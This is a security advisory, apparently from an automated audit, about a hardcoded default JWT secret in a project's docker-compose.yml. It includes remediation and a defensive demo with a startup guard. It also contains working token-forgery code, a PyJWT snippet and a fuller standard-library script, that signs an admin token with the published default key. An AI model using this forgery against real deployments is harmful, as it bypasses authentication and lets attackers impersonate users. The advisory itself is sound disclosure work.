Summary
This issue was identified by an automated security audit run by Claude.
Severity: CRITICAL (P0)
Description
The application has a hardcoded default SECRET_KEY that is used for JWT token signing. If deployed without changing this default, attackers can forge valid JWT tokens.
Location: docker-compose.yml (line 71)

```yaml
SECRET_KEY=${SECRET_KEY:-claudex_default_secret_key_for_development_only}
```

Attack Scenario
An attacker who knows the default secret key can forge valid authentication tokens:
```python
import jwt  # PyJWT
from datetime import datetime, timedelta, timezone

forged_token = jwt.encode(
    {
        "sub": "admin-user-uuid-here",   # Any user ID
        "aud": ["fastapi-users:auth"],   # audience fastapi-users checks on verification
        "exp": datetime.now(timezone.utc) + timedelta(days=365),
    },
    "claudex_default_secret_key_for_development_only",  # the default from docker-compose.yml
    algorithm="HS256",
)
# This token is now valid and grants access as any user
print(forged_token)
```

Remediation
Remove the default value and require explicit configuration:

```yaml
# docker-compose.yml
SECRET_KEY=${SECRET_KEY:?SECRET_KEY must be set}
```

This will cause the application to fail to start if SECRET_KEY is not explicitly set, preventing accidental deployment with insecure defaults.
Risk if Unfixed
Complete authentication bypass - attackers can impersonate any user including administrators.
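The forgery described in the issue and the guard it calls for, worked end to end as an added example. This is not code from the issue or from the project: HS256 signing and verification are implemented with the standard library instead of PyJWT so the script runs offline, `check_secret_key` is an assumed application-side startup guard that mirrors the `${SECRET_KEY:?...}` compose check, and `MIN_SECRET_BYTES` is an assumed policy. The user ID and audience values are the ones the issue shows.

```python
"""Default SECRET_KEY forge-and-verify demo (added example, not project code)."""
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

# The value docker-compose.yml falls back to when SECRET_KEY is unset.
DEFAULT_SECRET = "claudex_default_secret_key_for_development_only"
AUDIENCE = "fastapi-users:auth"   # audience claim carried by the issue's forged token
MIN_SECRET_BYTES = 32             # assumed policy: at least 256 bits of key material


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_hs256(claims: dict, secret: str) -> str:
    """Minimal HS256 JWT encoder (stand-in for PyJWT so this runs offline)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    body = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    signing_input = f"{header}.{body}"
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url(sig)}"


def decode_hs256(token: str, secret: str, audience: str, now: Optional[float] = None) -> dict:
    """Verify alg, signature, audience and expiry; raise ValueError on any failure."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, body_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":          # never let the token pick the algorithm
        raise ValueError("unexpected alg")
    expected = hmac.new(secret.encode(), f"{header_b64}.{body_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(body_b64))
    aud = claims.get("aud")
    if audience not in (aud if isinstance(aud, list) else [aud]):
        raise ValueError("audience mismatch")
    if claims.get("exp", 0) <= (time.time() if now is None else now):
        raise ValueError("token expired")
    return claims


def forge_token(secret: str, user_id: str = "admin-user-uuid-here", ttl_seconds: int = 365 * 86400) -> str:
    """The attacker's step: sign claims for any user with the known secret."""
    return encode_hs256({"sub": user_id, "aud": [AUDIENCE], "exp": int(time.time()) + ttl_seconds}, secret)


def check_secret_key(key: Optional[str]) -> Optional[str]:
    """Hypothetical startup guard: returns a reason to refuse to start, or None if the key is acceptable."""
    if not key:
        return "SECRET_KEY must be set"
    if key == DEFAULT_SECRET:
        return "SECRET_KEY is the published development default"
    if len(key.encode()) < MIN_SECRET_BYTES:
        return f"SECRET_KEY shorter than {MIN_SECRET_BYTES} bytes"
    return None


def demo(deployed_secret: str) -> Tuple[bool, Optional[str]]:
    """Is a token forged with the default key accepted by a deployment using deployed_secret,
    and would the startup guard have refused that key?"""
    forged = forge_token(DEFAULT_SECRET)
    try:
        decode_hs256(forged, deployed_secret, AUDIENCE)
        forged_accepted = True
    except ValueError:
        forged_accepted = False
    return forged_accepted, check_secret_key(deployed_secret)


if __name__ == "__main__":
    # Deployment left on the default: forged token accepted, guard would have refused to start.
    print("default key:", demo(DEFAULT_SECRET))
    # Deployment with its own 32-byte key: forged token rejected, guard passes.
    print("rotated key:", demo("b7f1c0d9e2a4468fa1c3b5d7e9f0a2c4"))
```

The `check_secret_key` guard is worth having in the application as well as in compose: the `:?` expansion only protects deployments that go through that compose file, while an in-process check also catches a `.env` or orchestrator that sets the variable to the documented default.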